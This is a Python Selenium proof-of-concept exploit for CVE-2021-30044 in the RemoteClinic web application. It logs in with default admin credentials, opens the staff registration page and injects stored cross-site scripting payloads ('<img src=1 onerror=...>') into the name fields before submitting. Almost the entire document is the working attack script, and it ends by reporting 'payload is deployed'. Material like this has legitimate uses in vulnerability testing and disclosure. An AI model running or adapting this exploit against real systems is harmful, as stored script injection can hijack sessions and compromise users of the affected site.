#!/usr/bin/python3
# Author: @nu11secur1ty 
# Debug: g3ck0dr1v3r
# CVE-2021-30044

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/RemoteClinic/login/"

#enter your login username
username="admin@domain.ext"

#enter your login password
password="remoteclinic"

#enter the element for username input field
element_for_username="user_id"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"

# Dai brauzura aaa ta eba
browser = webdriver.Chrome()	#uncomment this line,for chrome users
#browser = webdriver.Firefox()	#uncomment this line,for chrome users
#browser = webdriver.Safari()	#for macOS users[for others use chrome vis chromedriver]

# Otvarai da ne vlazam s kasata
browser.get((website_link))	

# Run...
try:
	username_element = browser.find_element_by_name(element_for_username)
	username_element.send_keys(username)		
	password_element  = browser.find_element_by_name(element_for_password)
	password_element.send_keys(password)
	
	### Login
	signInButton = browser.find_element_by_name(element_for_submit)
	signInButton.click()
	
	### Exploit
	element_for_natrutvanie="submit"
	browser.get(("http://localhost/RemoteClinic/staff/register.php"))
	
	### Inner text...
	browser.execute_script("document.querySelector('[name=\"first_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'") 
	browser.execute_script("document.querySelector('[name=\"last_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'") 
	browser.execute_script("document.querySelector('[name=\"userid\"]').value = 'nu11secur1ty@gmail.com'")
	browser.execute_script("document.querySelector('[name=\"passkey\"]').value = 'password'")
	browser.execute_script("document.querySelector('[name=\"contact\"]').value = '123456789'")
	browser.execute_script("document.querySelector('[name=\"mobile\"]').value = '12345678910'") 
	browser.execute_script("document.querySelector('[name=\"skype\"]').value = 'nu11secur1ty'")
	browser.execute_script("document.querySelector('[name=\"address\"]').value = 'Kurec A 31'")
	browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png")
	time.sleep(5)
	
	# Submit exploit
	signInButton = browser.find_element_by_name(element_for_natrutvanie)
	signInButton.click()
	
	# Maani sa i testwai posle 
	time.sleep(1)
	browser.get(("http://localhost/RemoteClinic/login/signout.php"))
	browser.close()
	
	
	print("payload is deployed...\n")
except Exception:
	
	#### This exception occurs if the element are not found in the webpage.
	print("Some error occured :(")